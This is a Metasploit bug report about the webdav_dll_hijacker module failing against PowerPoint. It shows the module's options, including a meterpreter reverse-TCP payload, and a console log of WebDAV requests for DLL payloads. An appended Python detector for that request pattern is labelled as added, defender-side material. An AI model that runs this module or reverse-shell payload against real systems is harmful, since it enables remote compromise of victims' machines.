Bug #2462
DLLHijacking exploit doesn't work
| Status: | Rejected | Start date: | 08/27/2010 |
|---|---|---|---|
| Priority: | Normal | Due date: | |
| Assignee: | Joshua J. Drake | % Done: | 0% |
| Category: | modules - exploits | | |
| Target version: | - | | |
| Resolution: | | Release Note: | |
Description
When I launch the webdav_dll_hijacker exploit it doesn't work. Here is the output:
```
msf exploit(webdav_dll_hijacker) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
BASENAME policy yes The base name for the listed files.
EXTENSIONS ppt pptx yes The list of extensions to generate
SHARENAME documents yes The name of the top-level share.
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 80 yes The daemon port to listen on (do not change)
URIPATH / yes The URI to use (do not change).
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LHOST 192.168.0.101 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(webdav_dll_hijacker) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.0.101:4444
[*]
[*] Exploit links are now available at \\192.168.0.101\documents\
[*]
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.0.101:80/
[*] Server started.
msf exploit(webdav_dll_hijacker) > [*] 192.168.0.100:25232 GET => REDIRECT (/documents)
[*] 192.168.0.100:25233 PROPFIND /documents
[*] 192.168.0.100:25233 PROPFIND => 301 (/documents)
[*] 192.168.0.100:25233 PROPFIND /documents/
[*] 192.168.0.100:25233 PROPFIND => 207 Directory (/documents/)
[*] 192.168.0.100:25233 PROPFIND => 207 Top-Level Directory
[*] 192.168.0.100:25233 PROPFIND /documents
[*] 192.168.0.100:25233 PROPFIND => 301 (/documents)
[*] 192.168.0.100:25233 PROPFIND /documents/
[*] 192.168.0.100:25233 PROPFIND => 207 Directory (/documents/)
[*] 192.168.0.100:25233 PROPFIND => 207 Top-Level Directory
[*] 192.168.0.100:25233 PROPFIND /documents
[*] 192.168.0.100:25233 PROPFIND => 301 (/documents)
[*] 192.168.0.100:25233 PROPFIND /documents/
[*] 192.168.0.100:25233 PROPFIND => 207 Directory (/documents/)
[*] 192.168.0.100:25233 PROPFIND => 207 Top-Level Directory
[*] 192.168.0.100:25233 PROPFIND /documents
[*] 192.168.0.100:25233 PROPFIND => 301 (/documents)
[*] 192.168.0.100:25233 PROPFIND /documents/
[*] 192.168.0.100:25233 PROPFIND => 207 Directory (/documents/)
[*] 192.168.0.100:25233 PROPFIND => 207 Top-Level Directory
[*] 192.168.0.100:25233 PROPFIND /documents/desktop.ini
[*] 192.168.0.100:25233 PROPFIND => 404 (/documents/desktop.ini)
[*] 192.168.0.100:25233 PROPFIND /documents
[*] 192.168.0.100:25233 PROPFIND => 301 (/documents)
[*] 192.168.0.100:25233 PROPFIND /documents/
[*] 192.168.0.100:25233 PROPFIND => 207 Directory (/documents/)
[*] 192.168.0.100:25233 PROPFIND /documents
[*] 192.168.0.100:25233 PROPFIND => 301 (/documents)
[*] 192.168.0.100:25233 PROPFIND /documents/
[*] 192.168.0.100:25233 PROPFIND => 207 Directory (/documents/)
[*] 192.168.0.100:25233 PROPFIND /documents/Thumbs.db
[*] 192.168.0.100:25233 PROPFIND => 207 File (/documents/Thumbs.db)
[*] 192.168.0.100:25238 GET => DATA (/documents/policy.ppt)
[*] 192.168.0.100:25233 LOCK => 404 (/documents/Thumbs.db)
[*] 192.168.0.100:25238 PROPFIND /DOCUMENTS
[*] 192.168.0.100:25238 PROPFIND => 301 (/DOCUMENTS)
[*] 192.168.0.100:25233 PROPFIND /DOCUMENTS/
[*] 192.168.0.100:25233 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] 192.168.0.100:25233 PROPFIND => 207 Top-Level Directory
[*] 192.168.0.100:25238 PROPFIND /DOCUMENTS
[*] 192.168.0.100:25238 PROPFIND => 301 (/DOCUMENTS)
[*] 192.168.0.100:25233 PROPFIND /DOCUMENTS/
[*] 192.168.0.100:25233 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] 192.168.0.100:25233 PROPFIND => 207 Top-Level Directory
[*] 192.168.0.100:25238 PROPFIND /documents/rsaenh.dll
[*] 192.168.0.100:25238 PROPFIND => 207 File (/documents/rsaenh.dll)
[*] 192.168.0.100:25233 GET => DLL Payload
snip...
[*] 192.168.0.100:25233 PROPFIND => 207 File (/documents/dssenh.dll)
[*] 192.168.0.100:25238 PROPFIND /documents/dssenh.dll
[*] 192.168.0.100:25238 PROPFIND => 207 File (/documents/dssenh.dll)
[*] 192.168.0.100:25233 PROPFIND /documents/dssenh.dll
[*] 192.168.0.100:25233 PROPFIND => 207 File (/documents/dssenh.dll)
[*] 192.168.0.100:25238 PROPFIND /documents/dssenh.dll
[*] 192.168.0.100:25238 PROPFIND => 207 File (/documents/dssenh.dll)
[*] 192.168.0.100:25233 PROPFIND /documents/dssenh.dll
[*] 192.168.0.100:25233 PROPFIND => 207 File (/documents/dssenh.dll)
[*] 192.168.0.100:25238 PROPFIND /documents/rsaenh.dll
[*] 192.168.0.100:25238 PROPFIND => 207 File (/documents/rsaenh.dll)
[*] 192.168.0.100:25233 PROPFIND /documents/rsaenh.dll
[*] 192.168.0.100:25233 PROPFIND => 207 File (/documents/rsaenh.dll)
[*] 192.168.0.100:25238 PROPFIND /documents/rsaenh.dll
[*] 192.168.0.100:25238 PROPFIND => 207 File (/documents/rsaenh.dll)
[*] 192.168.0.100:25233 PROPFIND /documents/rsaenh.dll
[*] 192.168.0.100:25233 PROPFIND => 207 File (/documents/rsaenh.dll)
```
And it continues like that forever, except when Office PowerPoint crashes.
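As an added defender-side example (not part of the bug report or of the Metasploit module): a small Python parser for the console log format shown above that flags a client requesting a .dll from the same share directory it has just fetched a document from, which is exactly the sequence visible in the output (policy.ppt, then rsaenh.dll and dssenh.dll). The sample lines are constructed to mimic that output and are not a real capture; the `.ppt`/`.pptx` default mirrors the module's EXTENSIONS setting.

```python
import posixpath
import re
from collections import defaultdict

# Constructed sample lines in the console format the bug report shows (not a real capture).
SAMPLE_LOG = """\
[*] 192.168.0.100:25233 PROPFIND /documents/
[*] 192.168.0.100:25233 PROPFIND => 207 Directory (/documents/)
[*] 192.168.0.100:25238 GET => DATA (/documents/policy.ppt)
[*] 192.168.0.100:25238 PROPFIND /DOCUMENTS/rsaenh.dll
[*] 192.168.0.100:25238 PROPFIND => 207 File (/documents/rsaenh.dll)
[*] 192.168.0.100:25233 GET => DLL Payload
[*] 192.168.0.100:25233 PROPFIND /documents/dssenh.dll
[*] 10.0.0.7:40001 GET => DATA (/documents/policy.ppt)
[*] 10.0.0.7:40001 PROPFIND /documents/Thumbs.db
"""

# "[*] <client>:<port> <METHOD> ..." ; the rest is either a request path or "=> <status> (<path>)"
LINE_RE = re.compile(r"^\[\*\] (\d{1,3}(?:\.\d{1,3}){3}):\d+ ([A-Z]+)(?: (.*))?$")

def parse_line(line):
    """Return (client_ip, method, path or None) for one console line, else None.
    Response lines without a parenthesised path (e.g. "GET => DLL Payload") give None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ip, method, rest = m.group(1), m.group(2), m.group(3) or ""
    if rest.startswith("=> "):
        pm = re.search(r"\(([^)]*)\)$", rest)
        return ip, method, (pm.group(1) if pm else None)
    return ip, method, (rest or None)

def find_dll_hijack_candidates(log_text, doc_exts=(".ppt", ".pptx")):
    """Flag, per client, any .dll requested from the same share directory after that
    client fetched a document: the search-order pattern of a WebDAV DLL hijack.
    Returns {ip: [(document_path, dll_path), ...]}, each DLL reported once per client."""
    last_doc = {}                 # ip -> most recently fetched document path
    hits, seen = defaultdict(list), set()
    for raw in log_text.splitlines():
        parsed = parse_line(raw)
        if not parsed or parsed[2] is None:
            continue
        ip, method, path = parsed
        low = path.lower()        # the client mixes /documents and /DOCUMENTS
        if method == "GET" and low.endswith(doc_exts):
            last_doc[ip] = path
        elif low.endswith(".dll") and ip in last_doc:
            same_dir = posixpath.dirname(low) == posixpath.dirname(last_doc[ip].lower())
            if same_dir and (ip, low) not in seen:
                seen.add((ip, low))
                hits[ip].append((last_doc[ip], path))
    return dict(hits)

if __name__ == "__main__":
    for ip, pairs in find_dll_hijack_candidates(SAMPLE_LOG).items():
        for doc, dll in pairs:
            print(f"{ip}: fetched {doc}, then requested {dll}")
```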
History
Updated by HD Moore over 1 year ago
- Status changed from New to Rejected
The file format you are trying is not exploitable; even though the rsaenh DLL is being opened, it is not being initialized. This occurs when rundll32 is used to do the load.